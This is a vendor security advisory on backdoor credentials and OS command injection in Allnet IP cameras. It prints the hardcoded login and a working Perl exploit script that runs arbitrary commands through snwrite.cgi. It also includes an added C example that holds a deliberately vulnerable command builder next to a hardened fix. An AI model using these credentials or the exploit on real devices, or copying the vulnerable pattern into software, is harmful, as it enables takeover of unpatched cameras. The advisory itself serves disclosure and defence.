Backdoors and direct OS command execution vulnerabilities

SEC Consult Vulnerability Lab Security Advisory < 20140122-1 >
=======================================================================
title: Backdoors and direct OS command execution vulnerabilities
product: Allnet ALL2281 & ALL2282 / IP-Cam Wireless Kompakt
vulnerable version: latest firmware available
fixed version: no fix from vendor, ALL2281 & ALL2282 not supported anymore
impact: critical
homepage: www.allnet.de
found: 2014-01-02
by: SEC Consult Vulnerability Lab
    www.sec-consult.com
=======================================================================

 

Vendor description:
-------------------
"We are a developer and manufacturer of advanced networking and communications
technology. Our innovative networking, storage, security and home automation
products are designed in our own laboratories and distributed in many European
countries."

source: www.allnet.de

Business recommendation:
------------------------
It is highly recommended not to use this product, as it is no longer supported
by the vendor. As a workaround, operate the IP camera only in dedicated
internal networks and do not allow access from public networks.

Vulnerability overview/description:
-----------------------------------
1) Backdoor account
Allnet has integrated a backdoor account into the web interface of the IP-Cam.
The credentials are hardcoded, so the device owner cannot change or remove
them; anyone who knows them can authenticate to the IP-Cam's web interface and
access several of its functions without holding a legitimate user account.

2) Direct OS command execution
Several CGI scripts/programs pass request parameters unsanitized to system(),
a classic OS command injection. This allows an authenticated attacker to
execute arbitrary commands on the underlying operating system. Since the
backdoor account satisfies the authentication requirement, no legitimate
credentials are needed to exploit this.

This leads to a full compromise of the IP-Cam.

Proof of concept:
-----------------
1) Backdoor account

The hardcoded credentials (username:password), accepted by the web interface's
HTTP Basic authentication:

productmaker:ftvsbannedcode

2) Direct OS command execution

Example for the CGI /maker/snwrite.cgi: the "mac" POST parameter ends up
unsanitized in a system() call. The script below wraps an arbitrary command in
backticks, redirects its output to a file below the web root and fetches that
file with a second request:

---cut here---

#!/usr/bin/perl
# allnet.de webcam
# makes use of backdoor uid:pwd = productmaker:ftvsbannedcode and
# system() commands in compiled c-cgi scripts
#
# usage: ./allnet-poc.pl [command] [host]
#
# research@sec-consult.com
###############################################

use strict;
use warnings;
use MIME::Base64;
use URI::Escape;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;

$|++;

my $cmd    = $ARGV[0] || 'ls -l';
my $server = $ARGV[1] || '127.0.0.1';

# HTTP Basic authentication with the hardcoded backdoor account
my $auth = 'Basic ' . encode_base64('productmaker:ftvsbannedcode', '');

my $ua      = LWP::UserAgent->new;
my $headers = HTTP::Headers->new;
$headers->header('Content-Type'  => 'application/x-www-form-urlencoded');
$headers->header('Authorization' => $auth);

# The "mac" parameter of snwrite.cgi is passed to system() unsanitized.
# Wrap the command in backticks and redirect its output to a file below
# the web root; the command itself is URL-encoded so that shell
# metacharacters survive the form decoding intact.
my $content = 'mac=%60' . uri_escape($cmd) . '+>+/server/cgi-bin/maker/sshell.asp%60';

my $req = HTTP::Request->new('POST', "http://$server/maker/snwrite.cgi", $headers, $content);
my $res = $ua->request($req);
warn 'POST returned ' . $res->status_line . "\n" unless $res->is_success;

# Fetch the command output written by the injected redirect.
$req = HTTP::Request->new('GET', "http://$server/maker/sshell.asp", $headers);
$res = $ua->request($req);
print $res->content();

---cut here---
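
The injection the PoC above exercises, reconstructed as an added example that is
neither the vendor's firmware code nor SEC Consult's: a minimal CGI-style handler
decodes the "mac" POST parameter from the advisory's payload, splices it into a
system() command line the way the vulnerable CGIs do, and a hardened variant
validates the value against a strict MAC address format and hands it to execv()
as a single argument instead, so no shell ever parses it. The helper binary
/usr/sbin/flashwrite and the details of the parameter handling are assumptions;
the advisory only states that the compiled C CGIs pass the parameter through
system().

```c
/* Added example, not the vendor's firmware or SEC Consult's PoC: a minimal
 * CGI-style handler for the "mac" parameter of snwrite.cgi, in the vulnerable
 * system() form and a hardened execv() form. The helper binary
 * "/usr/sbin/flashwrite" and the parameter handling are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Decode one application/x-www-form-urlencoded value ('+' -> ' ', %XX -> byte).
 * Returns the decoded length, or -1 on malformed input or a too-small buffer. */
int form_decode(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        int c = (unsigned char)in[i];
        if (c == '+') {
            c = ' ';
        } else if (c == '%') {
            if (!isxdigit((unsigned char)in[i + 1]) || !isxdigit((unsigned char)in[i + 2]))
                return -1;
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            c = (int)strtol(hex, NULL, 16);
            i += 2;
        }
        if (o + 1 >= outlen) return -1;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return (int)o;
}

/* Locate "mac=" as a whole key in a POST body and decode its value. */
int get_mac_param(const char *body, char *out, size_t outlen)
{
    const char *p = body;
    for (;;) {
        p = strstr(p, "mac=");
        if (p == NULL) return -1;
        if (p == body || p[-1] == '&') break;   /* skip e.g. "amac=" */
        p++;
    }
    p += 4;
    const char *end = strchr(p, '&');
    size_t rawlen = end ? (size_t)(end - p) : strlen(p);
    char raw[256];
    if (rawlen >= sizeof raw) return -1;
    memcpy(raw, p, rawlen);
    raw[rawlen] = '\0';
    return form_decode(raw, out, outlen);
}

/* VULNERABLE: the decoded value is spliced into a command line that the real
 * handler hands to system(). /bin/sh then interprets backticks, ';', '|', '>'
 * and friends. Returns 0 and the command string, -1 if it did not fit. */
int build_cmd_vulnerable(const char *mac, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "/usr/sbin/flashwrite -m %s", mac);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Allow-list check: exactly "xx:xx:xx:xx:xx:xx" with hex digits. */
int is_valid_mac(const char *mac)
{
    if (strlen(mac) != 17) return 0;
    for (int i = 0; i < 17; i++) {
        if (i % 3 == 2) { if (mac[i] != ':') return 0; }
        else if (!isxdigit((unsigned char)mac[i])) return 0;
    }
    return 1;
}

/* HARDENED: reject anything that is not a MAC address and never let a shell see
 * the value; it becomes a single argv element for execv(). Returns 0 and a
 * NULL-terminated argv on success, -1 on rejected input. */
int build_argv_hardened(const char *mac, const char *argv[4])
{
    if (!is_valid_mac(mac)) return -1;
    argv[0] = "/usr/sbin/flashwrite";
    argv[1] = "-m";
    argv[2] = mac;
    argv[3] = NULL;
    return 0;
}

/* The advisory's payload exactly as the PoC script puts it on the wire (constructed here). */
const char *POC_BODY = "mac=%60ls+-l+>+/server/cgi-bin/maker/sshell.asp%60";

int main(void)
{
    char mac[256], cmd[512];
    const char *argv[4];
    if (get_mac_param(POC_BODY, mac, sizeof mac) < 0) return 1;
    build_cmd_vulnerable(mac, cmd, sizeof cmd);
    printf("vulnerable handler would run: %s\n", cmd);
    printf("hardened handler: %s\n",
           build_argv_hardened(mac, argv) == 0 ? "accepted" : "rejected input");
    return 0;
}
```

Compiled and run as is, the program prints the full command line the vulnerable
handler would hand to the shell, backticks and output redirection included, and
reports that the hardened handler rejects the same input. The point of the
hardened variant is the combination: an allow-list on the only legitimate shape
of the value, plus an argv-based exec so that even a validation bug could not be
turned into shell metacharacter interpretation.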

 

 

Vulnerable / tested versions:
-----------------------------
The following IP camera has been tested:
IP-Cam ALL2281, latest firmware available

According to the vendor the product ALL2282 shares the same code base and
might be affected too.

Vendor contact timeline:
------------------------
2014-01-09: Contacting vendor through info@allnet.de and support@allnet.de
2014-01-09: Sending advisory information
2014-01-09: Vendor: product is not supported anymore
2014-01-22: SEC Consult releases security advisory

Solution:
---------
The product is no longer supported and there will be no updates from the
vendor.

Workaround:
-----------
Only operate the IP camera in dedicated internal networks and don't allow
access from public networks.

Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarters:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com

EOF SEC Consult vulnerability lab / @2014